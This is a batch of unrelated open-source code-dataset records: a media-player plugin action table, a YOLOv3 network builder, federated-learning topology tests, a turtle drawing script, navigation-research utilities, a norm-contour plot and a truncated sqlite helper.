Audio', None, 964),\n ('DVDNextSubtitle', 'DVD Next Subtitle', None, 965),\n ('DVDPrevSubtitle', 'DVD Prev Subtitle', None, 966),\n ('DVDOnOffSubtitle', 'DVD On/Off Subtitle', None, 967),\n)),\n(eg.ActionGroup, 'GroupExtendedControls', 'Extended controls', None, (\n ('OpenDevice', 'Open 
Device', None, 802),\n ('SaveAs', 'Save As', None, 805),\n ('SaveImage', 'Save Image', None, 806),\n ('SaveImageAuto', 'Save Image Auto', None, 807),\n ('LoadSubTitle', 'Load Subtitle', None, 809),\n ('SaveSubtitle', 'Save Subtitle', None, 810),\n ('Close', 'Close File', None, 804),\n ('Properties', 'Properties', None, 814),\n ('PlayerMenuShort', 'Player Menu Short', None, 949),\n ('PlayerMenuLong', 'Player Menu Long', None, 950),\n ('FiltersMenu', 'Filters Menu', None, 951),\n ('Options', 'Options', None, 815),\n ('NextAudio', 'Next Audio', None, 952),\n ('PrevAudio', 'Previous Audio', None, 953),\n (\n SetInteger,\n \"SetAudioTrack\",\n \"Set the audio track\",\n \"Sets the audio track.\",\n (CMD_SETAUDIOTRACK,2,0,9)\n ),\n ('NextSubtitle', 'Next Subtitle', None, 954),\n ('PrevSubtitle', 'Prev Subtitle', None, 955),\n (\n SetInteger,\n \"SetSubtitlesTrack\",\n \"Set the subtitle track\",\n \"Sets the subtitle track.\",\n (CMD_SETSUBTITLETRACK,3,-1,9)\n ),\n ('OnOffSubtitle', 'On/Off Subtitle', None, 956),\n ('GotoNextSubtitle', 'Goto Next Subtitle', None, 32781),\n ('GotoPrevSubtitle', 'Goto Prev Subtitle', None, 32780),\n ('SubtitleDelayMinus', 'Subtitle Delay -', None, 24000),\n ('SubtitleDelayPlus', 'Subtitle Delay +', None, 24001),\n (\n SetInteger,\n \"SetSubtitleDelay\",\n \"Set the subtitle delay\",\n \"Sets the subtitle delay.\",\n (CMD_SETSUBTITLEDELAY,6,-999999,999999)\n ),\n ('ReloadSubtitles', 'Reload Subtitles', None, 2302),\n ('NextAudioOGM', 'Next Audio OGM', None, 957),\n ('PrevAudioOGM', 'Previous Audio OGM', None, 958),\n ('NextSubtitleOGM', 'Next Subtitle OGM', None, 959),\n ('PrevSubtitleOGM', 'Previous Subtitle OGM', None, 960),\n (ShowMenu,'ShowMenu','Show MPC menu','Show MPC menu.', None),\n (GoTo_OSD,'GoTo_OSD','On Screen Go To ...','Show On Screen \"Go To ...\".', None),\n (SendOSD,\"SendOSD\",\"Show custom OSD\",\"Shows custom OSD.\",None),\n (AfterPlaybackOnce,\"AfterPlaybackOnce\",\"Action after playback (once)\",\"The selected action will be made after playback (once).\", None),\n (AfterPlayback,\"AfterPlayback\",\"Action after playback (every time)\",\"The selected action will be made after playback (every time).\", None),\n (UserMessage,'UserMessage',\"Send user's message\",UserMessage.description, None),\n)),\n(eg.ActionGroup, 'GroupToggleControls', 'Toggle player controls', None, (\n ('ToggleCaptionMenu', 'Toggle Caption Menu', None, 817),\n ('ToggleSeeker', 'Toggle Seeker', None, 818),\n ('ToggleControls', 'Toggle Controls', None, 819),\n ('ToggleInformation', 'Toggle Information', None, 820),\n ('ToggleStatistics', 'Toggle Statistics', None, 821),\n ('ToggleStatus', 'Toggle Status', None, 822),\n ('ToggleSubresyncBar', 'Toggle Subresync Bar', None, 823),\n ('TogglePlaylistBar', 'Toggle Playlist Bar', None, 824),\n ('ToggleCaptureBar', 'Toggle Capture Bar', None, 825),\n (SendCmd,\"ShaderToggle\",\"Toggle shader\",\"Toggles shader.\",CMD_SHADER_TOGGLE),\n ('ToggleShaderEditorBar', 'Toggle Shader Editor Bar', None, 826),\n ('ToggleElapsedTime', 'Toggle OSD Elapsed Time', None, 32778),\n)),\n(eg.ActionGroup, 'VariousInformationRetrieval',\"Retrieve various information\", None, (\n (GetWindowState,'GetWindowState','Get window state','Gets window state.', None),\n (GetNowPlaying,'GetNowPlaying','Get currently playing file','Gets currently playing file.', None),\n (GetTimes,'GetTimes','Get Times','Returns elapsed, remaining and total times.', None),\n (GetPosition,\"GetPosition\",\"Get current position\",\"Returns current position.\",None),\n 
(GetInfo,\"GetSubtitles\",\"Get subtitle tracks\",\"Asks for a list of the subtitle tracks of the file.\",CMD_GETSUBTITLETRACKS),\n (GetInfo,\"GetAudiotracks\",\"Get audio tracks\",\"Asks for a list of the audio tracks of the file.\",CMD_GETAUDIOTRACKS),\n (GetInfo,\"GetPlaylist\",\"Get playlist\",\"Asks for the current playlist.\",CMD_GETPLAYLIST),\n (GetPlayState,\"GetPlaystate\",\"Get play-state\",\"Returns current play-state.\",None),\n)),\n)\n#===============================================================================\n\n","repo_name":"EventGhost/EventGhost","sub_path":"plugins/MediaPlayerClassic/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":103419,"program_lang":"python","lang":"en","doc_type":"code","stars":418,"dataset":"github-code","pt":"31"} +{"seq_id":"41337139130","text":"import torch \nimport torch.nn as nn \nimport torch.nn.functional as F \nfrom torch.autograd import Variable\nimport numpy as np\nfrom util import predict_transform\n\ndef parse_cfg(cfgfile):\n \"\"\"\n Parse the cfg file that describes the network structure.\n\n Returns a list of dicts; each dict represents one block of the network structure.\n \"\"\"\n # read the cfg file\n file = open(cfgfile,\"r\")\n lines = file.read().split(\"\\n\")\n lines = [x for x in lines if len(x) > 0] # empty lines\n lines = [x for x in lines if x[0] != \"#\"] # comments\n lines = [x.rstrip().lstrip() for x in lines] # whitespaces\n\n block = {}\n blocks = []\n\n for line in lines:\n if line[0] == \"[\": # start of a new block, which also means the previous block has ended\n if len(block) != 0:\n blocks.append(block) # previous block fully parsed, append it\n block = {}\n block[\"type\"] = line[1:-1].rstrip()\n else:\n key,value = line.split(\"=\")\n block[key.rstrip()] = value.lstrip()\n blocks.append(block)\n\n return blocks\n\n\nclass EmptyLayer(nn.Module):\n \"\"\"\n Placeholder for the shortcut / route layers; the actual logic lives in the\n model's forward pass, not here\n \"\"\"\n def __init__(self):\n super(EmptyLayer,self).__init__()\n\nclass DetectionLayer(nn.Module):\n \"\"\"\n Detection layer: predicts object regions and classes on the feature map\n using anchors; the computation itself is implemented in predict_transform\n \"\"\"\n def __init__(self,anchors):\n super(DetectionLayer,self).__init__()\n self.anchors = anchors\n\ndef create_modules(blocks):\n net_info = blocks[0] # the first block holds the network/training configuration\n\n module_list = nn.ModuleList()\n prev_filters = 3\n output_filters = []\n\n for index,x in enumerate(blocks[1:]):\n module = nn.Sequential()\n\n if (x[\"type\"] == \"convolutional\"):\n activation = x[\"activation\"] # activation function\n # whether to apply batch normalization\n try:\n batch_normalize = int(x[\"batch_normalize\"])\n bias = False\n except:\n batch_normalize = 0\n bias = True \n filters = int(x[\"filters\"]) # number of filters\n padding = int(x[\"pad\"]) # whether to pad\n kernel_size = int(x[\"size\"]) # kernel size\n stride = int(x[\"stride\"]) # stride\n\n if padding:\n pad = (kernel_size - 1) // 2 # padding width that keeps the feature map size unchanged\n else:\n pad = 0\n \n # create the convolutional layer\n conv = nn.Conv2d(prev_filters,filters,kernel_size,stride,\n pad,bias=bias)\n module.add_module(\"conv_{}\".format(index),conv)\n\n # BN\n if batch_normalize:\n bn = nn.BatchNorm2d(filters)\n module.add_module(\"batch_norm_{}\".format(index),bn)\n\n # activation\n if activation == \"leaky\":\n activn = nn.LeakyReLU(0.1,inplace=True)\n module.add_module(\"leaky_{}\".format(index),activn)\n \n # an upsampling layer\n elif (x[\"type\"] == \"upsample\"):\n stride = int(x[\"stride\"])\n upsample = nn.Upsample(scale_factor=2,mode=\"bilinear\")\n module.add_module(\"upsample_{}\".format(index),upsample)\n\n # a route layer\n # when 'layers' is positive, the route layer outputs the features of that absolute layer index;\n # when it is negative, it outputs the layer that many steps back from the route layer\n elif (x[\"type\"] == \"route\"):\n x[\"layers\"] = 
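# --- Illustrative sketch (editor's addition): the route layer described in the comment above concatenates saved feature maps along the channel dimension, which is exactly what Darknet.forward later does with torch.cat:\n# import torch\n# a = torch.randn(1, 256, 13, 13)    # output of an earlier layer\n# b = torch.randn(1, 128, 13, 13)    # output of another referenced layer\n# routed = torch.cat((a, b), 1)      # shape (1, 384, 13, 13): channel counts add up\n# --- end sketch ---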
x[\"layers\"].split(\",\")\n\n start = int(x[\"layers\"][0])\n\n try:\n end = int(x[\"layers\"][1])\n except:\n end = 0\n\n if start > 0:\n start = start - index \n if end > 0:\n end = end - index\n route = EmptyLayer()\n module.add_module(\"route_{}\".format(index),route)\n\n if end < 0:\n filters = output_filters[index + start] + output_filters[index + end]\n else:\n filters = output_filters[index + start]\n\n # shortcut layer\n elif (x[\"type\"] == \"shortcut\"):\n shortcut = EmptyLayer()\n module.add_module(\"shortcut_{}\".format(index),shortcut)\n\n # yolo is the detection layer\n elif (x[\"type\"] == \"yolo\"):\n mask = x[\"mask\"].split(\",\")\n mask = [int(x) for x in mask]\n\n anchors = x[\"anchors\"].split(\",\")\n anchors = [int(a) for a in anchors]\n anchors = [(anchors[i],anchors[i+1]) for i in range(0,len(anchors),2)]\n anchors = [anchors[i] for i in mask]\n\n detection = DetectionLayer(anchors)\n module.add_module(\"Detection_{}\".format(index),detection)\n \n module_list.append(module)\n prev_filters = filters\n output_filters.append(filters)\n\n return (net_info,module_list)\n\nclass Darknet(nn.Module):\n def __init__(self,cfgfile):\n super(Darknet,self).__init__()\n self.blocks = parse_cfg(cfgfile)\n self.net_info,self.module_list = create_modules(self.blocks)\n\n def forward(self,x,CUDA):\n modules = self.blocks[1:]\n outputs = {} \n \n write = 0\n for i,module in enumerate(modules):\n module_type = (module[\"type\"])\n\n if module_type == \"convolutional\" or module_type == \"upsample\":\n x = self.module_list[i](x) # forward\n elif module_type == \"route\":\n layers = module[\"layers\"]\n layers = [int(a) for a in layers]\n\n if layers[0] > 0:\n layers[0] = layers[0] - i\n\n if len(layers) == 1:\n x = outputs[i + layers[0]]\n else:\n if layers[1] > 0:\n layers[1] = layers[1] - i\n map1 = outputs[i + layers[0]]\n map2 = outputs[i + layers[1]]\n x = torch.cat((map1,map2),1)\n elif module_type == \"shortcut\":\n form_ = int(module[\"from\"])\n x = outputs[i-1] + outputs[i + form_] # element-wise sum of the two feature maps\n\n elif module_type == \"yolo\":\n \n anchors = self.module_list[i][0].anchors\n\n inp_dim = int(self.net_info[\"height\"])\n num_classes = int(module[\"classes\"])\n\n x = x.data # the feature map feeding this yolo layer\n x = predict_transform(x,inp_dim,anchors,num_classes,CUDA)\n\n if not write:\n detections = x \n write = 1 \n else:\n detections = torch.cat((detections,x),1)\n outputs[i] = x\n return detections\n\nif __name__ == \"__main__\":\n blocks = parse_cfg(\"yolov3.cfg\")\n print(create_modules(blocks))","repo_name":"brookicv/PyTorch-practices","sub_path":"yolov3/darknet.py","file_name":"darknet.py","file_ext":"py","file_size_in_byte":6958,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"73515272409","text":"import json\n\nfrom fedstellar.utils.topologymanager import TopologyManager\n\n\n# set_test_settings()\n\ndef test_topology():\n topologymanager = TopologyManager(n_nodes=4, b_symmetric=True,\n undirected_neighbor_num=3)\n topologymanager.generate_topology()\n topology = topologymanager.get_topology()\n topologymanager.draw_graph()\n print(\"\\n\")\n print(topology)\n\n\ndef test_topology_6():\n topologymanager = TopologyManager(n_nodes=6, b_symmetric=True,\n undirected_neighbor_num=5)\n topologymanager.generate_topology()\n topology = topologymanager.get_topology()\n topologymanager.draw_graph()\n print(\"\\n\")\n print(topology)\n\n\ndef test_ring_topology():\n topologymanager = TopologyManager(scenario_name=\"example\", n_nodes=5, 
b_symmetric=True)\n topologymanager.generate_ring_topology()\n topology = topologymanager.get_topology()\n topologymanager.draw_graph()\n print(\"\\n\")\n print(topology)\n\n\ndef test_ring_topology2():\n # Import configuration file\n with open(\"/fedstellar/config/topology.json.example\") as json_file:\n config = json.load(json_file)\n n_nodes = len(config['nodes'])\n\n # Create a partially connected network (ring-structured network)\n topologymanager = TopologyManager(n_nodes=n_nodes, b_symmetric=True)\n topologymanager.generate_ring_topology()\n topology = topologymanager.get_topology()\n print(topology)\n\n nodes_ip_port = []\n for i in config['nodes']:\n nodes_ip_port.append((i['ip'], i['port']))\n\n topologymanager.add_nodes(nodes_ip_port)\n topologymanager.draw_graph()\n\ndef test_topology_centralized():\n\n # Create a partially connected network (ring-structured network)\n topologymanager = TopologyManager(n_nodes=5, b_symmetric=True, server=True)\n topologymanager.generate_topology()\n topology = topologymanager.get_topology()\n print(topology)\n topologymanager.draw_graph()\n","repo_name":"enriquetomasmb/fedstellar","sub_path":"test/topologymanager_test.py","file_name":"topologymanager_test.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"31"} +{"seq_id":"74273453207","text":"\"\"\"\nAuthor: Leo Vidarte \n\nThis is free software,\nyou can redistribute it and/or modify it\nunder the terms of the GPL version 3\nas published by the Free Software Foundation.\n\n\"\"\"\n\nimport random\nimport turtle\nfrom colores import colores\n\nrandom.shuffle(colores)\n\n\nWIDTH = 800\nHEIGHT = 600\n\n\ndef dibujar_circulo(event):\n radio = random.randint(10, 100)\n x = -(WIDTH/2) + event.x\n y = (HEIGHT/2) - event.y\n\n turtle.penup()\n turtle.setpos(x, y)\n turtle.right(90)\n turtle.fd(radio)\n turtle.left(90)\n turtle.pendown()\n\n turtle.color(colores.pop())\n turtle.begin_fill()\n turtle.circle(radio)\n turtle.end_fill()\n\n\nif __name__ == '__main__':\n\n turtle.setup(WIDTH, HEIGHT)\n turtle.title('Circulos')\n turtle.speed(0)\n turtle.hideturtle()\n\n screen = turtle.Screen()\n screen._root.bind('<Button-1>', dibujar_circulo)\n\n turtle.mainloop()\n","repo_name":"lvidarte/logo","sub_path":"circulos.py","file_name":"circulos.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35342261620","text":"import glob\nimport os\nfrom typing import (\n Dict,\n List,\n Optional,\n Union,\n)\n\nimport cv2\nimport numpy as np\nfrom scipy import interpolate\nimport torch\nfrom timm.models.vision_transformer import resize_pos_embed\nimport wandb\n\nfrom habitat.utils.visualizations.utils import (\n images_to_video,\n draw_collision,\n tile_images,\n)\nfrom habitat.utils.visualizations import maps\n\nfrom lmnav.emb_transfer.models.resnet_gn import ResNet\nfrom lmnav.emb_transfer.models.vit import VisionTransformer\n\n\ndef load_encoder(encoder, path):\n assert os.path.exists(path)\n if isinstance(encoder.backbone, ResNet):\n state_dict = torch.load(path, map_location=\"cpu\")[\"teacher\"]\n state_dict = {k.replace(\"module.\", \"\"): v for k, v in state_dict.items()}\n return encoder.load_state_dict(state_dict=state_dict, strict=False)\n elif isinstance(encoder.backbone, VisionTransformer):\n model = encoder.backbone\n state_dict = torch.load(path, map_location=\"cpu\")[\"model\"]\n if state_dict[\"pos_embed\"].shape != 
model.pos_embed.shape:\n state_dict[\"pos_embed\"] = resize_pos_embed(\n state_dict[\"pos_embed\"],\n model.pos_embed,\n getattr(model, \"num_tokens\", 1),\n model.patch_embed.grid_size,\n )\n return model.load_state_dict(state_dict=state_dict, strict=False)\n elif isinstance(encoder.backbone, Beit):\n model = encoder.backbone\n state_dict = torch.load(path, map_location=\"cpu\")[\"model\"]\n return load_data2vec(state_dict, model)\n else:\n raise ValueError(\"unknown encoder backbone\")\n\n\ndef load_data2vec(checkpoint_model, model):\n state_dict = model.state_dict()\n for k in ['head.weight', 'head.bias']:\n if k in checkpoint_model and checkpoint_model[k].shape != state_dict[k].shape:\n print(f\"Removing key {k} from pretrained checkpoint\")\n del checkpoint_model[k]\n\n if model.use_rel_pos_bias and \"rel_pos_bias.relative_position_bias_table\" in checkpoint_model:\n print(\"Expand the shared relative position embedding to each transformer block. \")\n num_layers = model.get_num_layers()\n rel_pos_bias = checkpoint_model[\"rel_pos_bias.relative_position_bias_table\"]\n for i in range(num_layers):\n checkpoint_model[\"blocks.%d.attn.relative_position_bias_table\" % i] = rel_pos_bias.clone()\n\n checkpoint_model.pop(\"rel_pos_bias.relative_position_bias_table\")\n\n all_keys = list(checkpoint_model.keys())\n for key in all_keys:\n if \"relative_position_index\" in key:\n checkpoint_model.pop(key)\n\n if \"relative_position_bias_table\" in key:\n rel_pos_bias = checkpoint_model[key]\n src_num_pos, num_attn_heads = rel_pos_bias.size()\n dst_num_pos, _ = model.state_dict()[key].size()\n dst_patch_shape = model.patch_embed.grid_size\n if dst_patch_shape[0] != dst_patch_shape[1]:\n raise NotImplementedError()\n num_extra_tokens = dst_num_pos - (dst_patch_shape[0] * 2 - 1) * (dst_patch_shape[1] * 2 - 1)\n src_size = int((src_num_pos - num_extra_tokens) ** 0.5)\n dst_size = int((dst_num_pos - num_extra_tokens) ** 0.5)\n if src_size != dst_size:\n print(\"Position interpolate for %s from %dx%d to %dx%d\" % (\n key, src_size, src_size, dst_size, dst_size))\n extra_tokens = rel_pos_bias[-num_extra_tokens:, :]\n rel_pos_bias = rel_pos_bias[:-num_extra_tokens, :]\n\n def geometric_progression(a, r, n):\n return a * (1.0 - r ** n) / (1.0 - r)\n\n left, right = 1.01, 1.5\n while right - left > 1e-6:\n q = (left + right) / 2.0\n gp = geometric_progression(1, q, src_size // 2)\n if gp > dst_size // 2:\n right = q\n else:\n left = q\n\n # if q > 1.090307:\n # q = 1.090307\n\n dis = []\n cur = 1\n for i in range(src_size // 2):\n dis.append(cur)\n cur += q ** (i + 1)\n\n r_ids = [-_ for _ in reversed(dis)]\n\n x = r_ids + [0] + dis\n y = r_ids + [0] + dis\n\n t = dst_size // 2.0\n dx = np.arange(-t, t + 0.1, 1.0)\n dy = np.arange(-t, t + 0.1, 1.0)\n\n print(\"Original positions = %s\" % str(x))\n print(\"Target positions = %s\" % str(dx))\n\n all_rel_pos_bias = []\n\n for i in range(num_attn_heads):\n z = rel_pos_bias[:, i].view(src_size, src_size).float().numpy()\n f = interpolate.interp2d(x, y, z, kind='cubic')\n all_rel_pos_bias.append(\n torch.Tensor(f(dx, dy)).contiguous().view(-1, 1).to(rel_pos_bias.device))\n\n rel_pos_bias = torch.cat(all_rel_pos_bias, dim=-1)\n\n new_rel_pos_bias = torch.cat((rel_pos_bias, extra_tokens), dim=0)\n checkpoint_model[key] = new_rel_pos_bias\n\n # interpolate position embedding\n if 'pos_embed' in checkpoint_model:\n pos_embed_checkpoint = checkpoint_model['pos_embed']\n embedding_size = pos_embed_checkpoint.shape[-1]\n num_patches = model.patch_embed.num_patches\n 
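# --- Illustrative sketch (editor's addition): the bisection above searches for the ratio q whose geometric series of src_size//2 steps spans dst_size//2 positions. The same search as a standalone helper (toy sizes, not taken from any checkpoint):\n# def solve_ratio(steps, span, eps=1e-6):\n#     gp = lambda q: (1.0 - q ** steps) / (1.0 - q)   # sum of q**0 .. q**(steps - 1)\n#     lo, hi = 1.01, 1.5\n#     while hi - lo > eps:\n#         mid = (lo + hi) / 2.0\n#         if gp(mid) > span:\n#             hi = mid\n#         else:\n#             lo = mid\n#     return (lo + hi) / 2.0\n# # e.g. solve_ratio(7, 12) gives the spacing ratio for stretching a 14x14\n# # relative-position table onto a 24x24 grid, mirroring src_size=14, dst_size=24.\n# --- end sketch ---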
num_extra_tokens = model.pos_embed.shape[-2] - num_patches\n # height (== width) for the checkpoint position embedding\n orig_size = int((pos_embed_checkpoint.shape[-2] - num_extra_tokens) ** 0.5)\n # height (== width) for the new position embedding\n new_size = int(num_patches ** 0.5)\n # class_token and dist_token are kept unchanged\n if orig_size != new_size:\n print(\"Position interpolate from %dx%d to %dx%d\" % (orig_size, orig_size, new_size, new_size))\n extra_tokens = pos_embed_checkpoint[:, :num_extra_tokens]\n # only the position tokens are interpolated\n pos_tokens = pos_embed_checkpoint[:, num_extra_tokens:]\n pos_tokens = pos_tokens.reshape(-1, orig_size, orig_size, embedding_size).permute(0, 3, 1, 2)\n pos_tokens = torch.nn.functional.interpolate(\n pos_tokens, size=(new_size, new_size), mode='bicubic', align_corners=False)\n pos_tokens = pos_tokens.permute(0, 2, 3, 1).flatten(1, 2)\n new_pos_embed = torch.cat((extra_tokens, pos_tokens), dim=1)\n checkpoint_model['pos_embed'] = new_pos_embed\n\n return model.load_state_dict(checkpoint_model, strict=False)\n\n\ndef setup_wandb(config, train, project_name=\"imagenav\"):\n if train:\n file_name = \"wandb_id.txt\"\n project_name = project_name + \"_training\"\n run_name = config.WANDB_NAME + \"_\" + str(config.TASK_CONFIG.SEED)\n else:\n file_name = \"wandb_id_eval_\" + str(config.EVAL.SPLIT) + \".txt\"\n project_name = project_name + \"_testing\"\n ckpt_str = \"_\"\n if os.path.isfile(config.EVAL_CKPT_PATH_DIR):\n ckpt_str = \"_\" + config.EVAL_CKPT_PATH_DIR.split(\"/\")[-1].split(\".\")[1] + \"_\"\n run_name = config.WANDB_NAME + \"_\" + str(config.EVAL.SPLIT) + ckpt_str + \\\n str(config.TASK_CONFIG.SEED)\n\n wandb_filepath = os.path.join(config.TENSORBOARD_DIR, file_name)\n\n # If file exists, then we are resuming from a previous eval\n if os.path.exists(wandb_filepath):\n with open(wandb_filepath, 'r') as file:\n wandb_id = file.read().rstrip('\\n')\n\n wandb.init(\n group=config.WANDB_NAME,\n job_type=str(config.TASK_CONFIG.SEED),\n id=wandb_id,\n project=project_name,\n config=config,\n mode=config.WANDB_MODE,\n resume='allow'\n )\n\n else:\n wandb_id = wandb.util.generate_id()\n\n with open(wandb_filepath, 'w') as file:\n file.write(wandb_id)\n\n wandb.init(\n group=config.WANDB_NAME,\n job_type=str(config.TASK_CONFIG.SEED),\n id=wandb_id,\n project=project_name,\n config=config,\n mode=config.WANDB_MODE\n )\n\n wandb.run.name = run_name\n wandb.run.save()\n\n\ndef poll_checkpoint_folder(\n checkpoint_folder: str, previous_ckpt_ind: int, suggested_interval: int, max_ckpts: int\n) -> Optional[str]:\n r\"\"\"Return (previous_ckpt_ind + 1)th checkpoint in checkpoint folder\n (sorted by time of last modification).\n Args:\n checkpoint_folder: directory to look for checkpoints.\n previous_ckpt_ind: index of checkpoint last returned.\n Returns:\n return checkpoint path if (previous_ckpt_ind + 1)th checkpoint is found\n else return None.\n \"\"\"\n assert os.path.isdir(checkpoint_folder), (\n f\"invalid checkpoint folder \" f\"path {checkpoint_folder}\"\n )\n models_paths = list(\n filter(os.path.isfile, glob.glob(checkpoint_folder + \"/*\"))\n )\n\n models_paths.sort(key=os.path.getmtime)\n\n if previous_ckpt_ind == -1:\n ind = 0\n else:\n ind = previous_ckpt_ind + suggested_interval\n\n if ind < len(models_paths):\n return models_paths[ind], ind\n elif ind == max_ckpts and len(models_paths) == max_ckpts:\n return models_paths[-1], len(models_paths) - 1\n\n return None, previous_ckpt_ind\n\n\ndef 
observations_to_image(observation: Dict, info: Dict) -> np.ndarray:\n r\"\"\"Generate image of single frame from observation and info\n returned from a single environment step().\n Args:\n observation: observation returned from an environment step().\n info: info returned from an environment step().\n Returns:\n generated image of a single frame.\n \"\"\"\n render_obs_images: List[np.ndarray] = []\n for sensor_name in observation:\n if \"rgb\" in sensor_name:\n rgb = observation[sensor_name]\n if not isinstance(rgb, np.ndarray):\n rgb = rgb.cpu().numpy()\n\n render_obs_images.append(rgb)\n elif \"depth\" in sensor_name:\n depth_map = observation[sensor_name].squeeze() * 255.0\n if not isinstance(depth_map, np.ndarray):\n depth_map = depth_map.cpu().numpy()\n\n depth_map = depth_map.astype(np.uint8)\n depth_map = np.stack([depth_map for _ in range(3)], axis=2)\n render_obs_images.append(depth_map)\n\n # add image goal if observation has image_goal info\n if \"imagegoal\" in observation or \"imagegoalrotation\" in observation:\n if \"imagegoal\" in observation:\n rgb = observation[\"imagegoal\"]\n else:\n rgb = observation[\"imagegoalrotation\"]\n if not isinstance(rgb, np.ndarray):\n rgb = rgb.cpu().numpy()\n\n render_obs_images.append(rgb)\n\n assert (\n len(render_obs_images) > 0\n ), \"Expected at least one visual sensor enabled.\"\n\n shapes_are_equal = len(set(x.shape for x in render_obs_images)) == 1\n if not shapes_are_equal:\n render_frame = tile_images(render_obs_images)\n else:\n render_frame = np.concatenate(render_obs_images, axis=1)\n\n # draw collision\n if \"collisions\" in info and info[\"collisions\"][\"is_collision\"]:\n render_frame = draw_collision(render_frame)\n\n if \"top_down_map\" in info:\n top_down_map = maps.colorize_draw_agent_and_fit_to_height(\n info[\"top_down_map\"], render_frame.shape[0]\n )\n render_frame = np.concatenate((render_frame, top_down_map), axis=1)\n return render_frame\n\n\ndef generate_video(\n video_option: List[str],\n video_dir: Optional[str],\n images: List[np.ndarray],\n episode_id: Union[int, str],\n checkpoint_idx: int,\n metrics: Dict[str, float],\n fps: int = 10,\n verbose: bool = True,\n) -> None:\n r\"\"\"Generate video according to specified information.\n Args:\n video_option: string list of \"tensorboard\" or \"disk\" or both.\n video_dir: path to target video directory.\n images: list of images to be converted to video.\n episode_id: episode id for video naming.\n checkpoint_idx: checkpoint index for video naming.\n metric_name: name of the performance metric, e.g. 
\"spl\".\n metric_value: value of metric.\n tb_writer: tensorboard writer object for uploading video.\n fps: fps for generated video.\n Returns:\n None\n \"\"\"\n if len(images) < 1:\n return\n\n metric_strs = []\n for k, v in metrics.items():\n metric_strs.append(f\"{k}={v:.2f}\")\n\n video_name = f\"episode={episode_id}-ckpt={checkpoint_idx}-\" + \"-\".join(\n metric_strs\n )\n if \"disk\" in video_option:\n assert video_dir is not None\n images_to_video(images, video_dir, video_name, verbose=verbose)\n if \"wandb\" in video_option:\n images = np.array(images)\n images = images.transpose(0, 3, 1, 2)\n wandb.log({f\"episode{episode_id}_{checkpoint_idx}\": wandb.Video(images, fps=fps)})\n\n\ndef add_info_to_image(frame, info):\n string = \"d2g: {} | a2g: {} |\\nsimple reward: {} |\\nsuccess: {} | angle success: {}\".format(\n round(info[\"distance_to_goal\"], 3),\n round(info[\"angle_to_goal\"], 3),\n round(info[\"simple_reward\"], 3),\n round(info[\"success\"], 3),\n round(info[\"angle_success\"], 3),\n )\n # frame = append_text_to_image(frame, string)\n return frame\n","repo_name":"pranav-putta/lm-nav","sub_path":"lmnav/emb_transfer/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":13543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43312258175","text":"\r\n###############\r\n# Authored by Weisheng Jiang\r\n# Book 3 | From Basic Arithmetic to Machine Learning\r\n# Published and copyrighted by Tsinghua University Press\r\n# Beijing, China, 2022\r\n###############\r\n\r\n# Bk3_Ch9_04\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\na = 1;\r\nb = 1;\r\n\r\np = [0.5,1,2,3]\r\nq = p\r\n\r\npp,qq = np.meshgrid(p,q)\r\npp = pp.flatten()\r\nqq = qq.flatten()\r\n\r\nx1 = np.linspace(-2, 2, num=101);\r\nx2 = x1;\r\n\r\nxx1, xx2 = np.meshgrid(x1,x2)\r\n\r\nfig, axes = plt.subplots(ncols=4,nrows=4,\r\n figsize=(12, 12))\r\n\r\nfor p, q, ax in zip(pp, qq, axes.flat):\r\n \r\n if np.isinf(p):\r\n zz = np.maximum(np.abs(xx1/a),np.abs(xx2/b))\r\n else:\r\n zz = ((np.abs((xx1/a))**p) + (np.abs((xx2/b))**q))**(1./q)\r\n \r\n # plot contour of Lp\r\n ax.contourf(xx1, xx2, zz, 20, cmap='RdYlBu_r')\r\n \r\n # plot contour of Lp = 1\r\n ax.contour (xx1, xx2, zz, [1], colors='k', linewidths = 2) \r\n \r\n # decorations\r\n\r\n ax.axhline(y=0, color='k', linewidth = 0.25)\r\n ax.axvline(x=0, color='k', linewidth = 0.25)\r\n ax.set_xlim(-2, 2)\r\n ax.set_ylim(-2, 2)\r\n ax.spines['top'].set_visible(False)\r\n ax.spines['right'].set_visible(False)\r\n ax.spines['bottom'].set_visible(False)\r\n ax.spines['left'].set_visible(False)\r\n ax.set_xlabel('$x_1$')\r\n ax.set_ylabel('$x_2$')\r\n ax.set_title('p = ' + str(p) + 'q = ' + str(q))\r\n ax.set_aspect('equal', adjustable='box')\r\n\r\nplt.show()\r\n","repo_name":"Visualize-ML/Book3_Elements-of-Mathematics","sub_path":"Book3_Ch09_Python_Codes/Bk3_Ch9_04.py","file_name":"Bk3_Ch9_04.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":4864,"dataset":"github-code","pt":"31"} +{"seq_id":"28331524440","text":"\nimport sqlite3 as sql\nimport logging\nspeedrunner_log = logging.getLogger(__name__)\n\ndef get_categories_by_game_id(con, game_id):\n cur = con.cursor()\n rows = cur.execute(\"SELECT category_id FROM GamesCategories WHERE game_id = '\" + str(game_id) + \"' ORDER BY category_id DESC\").fetchall()\n return [category_id[0] for category_id in rows]\n\ndef add_game_category_by_id(con, game_id, category_id):\n cur 
